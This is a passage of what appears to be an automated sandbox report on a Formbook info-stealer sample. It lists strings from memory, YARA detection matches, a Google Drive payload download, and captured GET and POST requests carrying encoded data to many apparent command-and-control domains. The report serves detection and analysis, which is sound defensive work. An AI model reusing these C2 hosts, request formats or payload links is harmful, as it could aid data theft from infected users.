      Source: explorer.exe, 0000001D.00000000.1662089773.000000000D122000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1591955113.000000000D122000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1458434376.000000000D122000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1736000722.000000000D122000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.come
      Source: help.exe, 00000013.00000002.5837586951.0000000004FEA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://sedo.com/search/details/?partnerid=324561&language=d&domain=popular.directory&origin=sales_l
      Source: help.exe, 00000013.00000002.5841740291.0000000007D98000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
      Source: help.exe, 00000013.00000003.1932954481.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
      Source: help.exe, 00000013.00000003.1932954481.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
      Source: explorer.exe, 0000001D.00000000.1666507279.000000000D37E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1739864763.000000000D37E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.cn/shellRESP
      Source: explorer.exe, 0000001D.00000000.1666507279.000000000D37E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1739864763.000000000D37E000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com/shell
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell
      Source: explorer.exe, 0000001D.00000000.1483111483.000000001009F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680933547.000000001009F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609653243.000000001009F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/
      Source: explorer.exe, 0000001D.00000000.1479232269.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1607377108.000000000FF1B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1678904598.000000000FF1B000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.comy
      Source: help.exe, 00000013.00000002.5838386641.00000000054A0000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://wordpress.org
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://ww.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filming
      Source: help.exe, 00000013.00000003.1933284850.0000000007E7A000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1482506374.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1475557678.000000000FBBB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1609251797.000000001005A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1675793911.000000000FBBB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1680572544.000000001005A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
      Source: help.exe, 00000013.00000003.1932954481.0000000007E11000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000003.1928937350.0000000007DBB000.00000004.00000800.00020000.00000000.sdmp, 231-EqK-.19.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/charges-man-snapped-killed-4-then-left-bodies-in-field/ar-AAOGa
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/technology/facebook-oversight-board-reviewing-xcheck-system-for-vips/
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-al
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/texas-gov-abbott-sends-miles-of-cars-along-border-to-deter-migrant
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/celebrity/tarek-el-moussa-tests-positive-for-covid-19-shuts-down-filmin
      Source: explorer.exe, 0000001D.00000000.1578203859.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1719526997.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1646036083.0000000005400000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.1437337668.0000000005400000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
      Source: help.exe, 00000013.00000002.5838813103.0000000005632000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/
      Source: help.exe, 00000013.00000002.5838813103.0000000005632000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.nic.ru/help/oshibka-404_8500.html
      Source: help.exe, 00000013.00000002.5839690170.0000000006210000.00000004.00000800.00020000.00000000.sdmp, help.exe, 00000013.00000002.5838050175.000000000530E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.register.com/whois.rcmx?domainName=Pinwheeleffect.org
      Source: help.exe, 00000013.00000002.5838813103.0000000005632000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://yastatic.net/pcode/adfox/loader.js
      Source: help.exe, 00000013.00000002.5836975372.0000000004B34000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js
      Source: unknownHTTP traffic detected: POST /nqhc/ HTTP/1.1Host: www.searchbot.suConnection: closeContent-Length: 187Cache-Control: no-cacheOrigin: http://www.searchbot.suUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.searchbot.su/nqhc/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 37 6e 57 48 56 3d 39 6a 5a 50 44 69 71 45 4a 47 6e 31 68 71 50 63 4a 53 4c 33 50 73 74 6f 61 70 61 52 76 30 4b 52 30 70 68 4f 30 4e 45 51 34 4a 4f 38 66 61 6b 44 33 38 6c 38 43 57 66 6c 75 35 6a 6c 28 76 75 52 30 4d 55 62 33 43 72 61 63 63 35 58 47 68 44 33 65 68 6c 39 56 44 66 49 4e 55 43 4b 72 47 31 57 32 69 75 4f 35 5a 45 50 73 61 36 4f 57 50 78 66 77 41 47 37 59 43 48 6a 55 6a 61 31 6d 53 66 35 6c 49 43 67 4f 61 77 36 78 46 32 51 34 7a 38 59 52 69 6d 61 73 4b 31 65 35 63 7a 55 61 56 4d 43 64 6e 5a 52 43 69 30 62 6d 38 39 56 54 50 64 57 56 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 7nWHV=9jZPDiqEJGn1hqPcJSL3PstoapaRv0KR0phO0NEQ4JO8fakD38l8CWflu5jl(vuR0MUb3Cracc5XGhD3ehl9VDfINUCKrG1W2iuO5ZEPsa6OWPxfwAG7YCHjUja1mSf5lICgOaw6xF2Q4z8YRimasK1e5czUaVMCdnZRCi0bm89VTPdWVg).
      Source: unknownDNS traffic detected: queries for: drive.google.com
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ci_fZY9vhWqDsoVL9EsZt-nC3_CtEg73 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/41p6p8b8de87nda3pnh8ht90u3kusm97/1670249550000/00631903678986001080/*/1ci_fZY9vhWqDsoVL9EsZt-nC3_CtEg73?e=download&uuid=85b46012-288f-4c0a-b12e-c636b72305d2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-7s-docs.googleusercontent.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&t0D=yFNHS0IX HTTP/1.1Host: www.labour-office.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&t0D=yFNHS0IX HTTP/1.1Host: www.searchbot.suConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&t0D=yFNHS0IX HTTP/1.1Host: www.youlian.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX HTTP/1.1Host: www.royaltechglobal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&t0D=yFNHS0IX HTTP/1.1Host: www.xiaoxiuzhen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&t0D=yFNHS0IX HTTP/1.1Host: www.gumba.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IX HTTP/1.1Host: www.botbillionsblaze.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&t0D=yFNHS0IX HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&t0D=yFNHS0IX HTTP/1.1Host: www.gouldent.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&t0D=yFNHS0IX HTTP/1.1Host: www.apidachicago.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&t0D=yFNHS0IX HTTP/1.1Host: www.funknive.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=YpBcfthyu6gwcnN/g9jRvpxtfUkdEaz6LsXfXUppEZSnE0c1g3RTY5b27kCACk8vV3w0fGJq4rusk2G49vjJdiO+izISunFXUA==&t0D=yFNHS0IX HTTP/1.1Host: www.xn--29-oj9ik7b890b.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&t0D=yFNHS0IX HTTP/1.1Host: www.phootka.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&t0D=yFNHS0IX HTTP/1.1Host: www.wellnessprodia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&t0D=yFNHS0IX HTTP/1.1Host: www.labour-office.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&t0D=yFNHS0IX HTTP/1.1Host: www.searchbot.suConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&t0D=yFNHS0IX HTTP/1.1Host: www.youlian.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&t0D=yFNHS0IX HTTP/1.1Host: www.royaltechglobal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&t0D=yFNHS0IX HTTP/1.1Host: www.xiaoxiuzhen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&t0D=yFNHS0IX HTTP/1.1Host: www.gumba.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&t0D=yFNHS0IX HTTP/1.1Host: www.botbillionsblaze.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&t0D=yFNHS0IX HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&t0D=yFNHS0IX HTTP/1.1Host: www.gouldent.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=8A76ZuiHZi/Ws5XZc39lk8dA+0cq1C26/U6x4YBy0tC3IrxrLO2FUR3fJNTj7bksOQnQlH1KHIWsq/xPw5a7PJ/V5JkWh/vDvg==&jP1=y48xBzJ0mzz HTTP/1.1Host: www.popular.directoryConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&jP1=y48xBzJ0mzz HTTP/1.1Host: www.wellnessprodia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?7nWHV=5+D/AEotBIiARx+RPOYdHDoSCIwvlBfWKmb14ofQdN1lqNdZOlbl7P8VoNd3a3Fenblb13q2VSw+uZcH+Wrp87x4A2/T8XiFdA==&jP1=y48xBzJ0mzz HTTP/1.1Host: www.pinwheeleffect.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: unknownHTTPS traffic detected: 172.217.23.110:443 -> 192.168.11.20:49821 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.184.225:443 -> 192.168.11.20:49823 version: TLS 1.2
      Source: C:\Users\user\Desktop\Jjfmcz1Hsz.exeCode function: 2_2_00405050 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,2_2_00405050

      E-Banking Fraud

      barindex
      Source: Yara matchFile source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

      System Summary

      barindex
      Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000000.1278161969.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000013.00000002.5815954782.00000000035E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000B.00000002.1342878125.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000012.00000000.1285874295.00000000006E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000013.00000002.5794216135.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: Jjfmcz1Hsz.exe PID: 2000, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Process Memory Space: help.exe PID: 3568, type: MEMORYSTRMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
      Source: Jjfmcz1Hsz.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000B.00000002.1323306443.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000013.00000002.5817316852.0000000003610000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
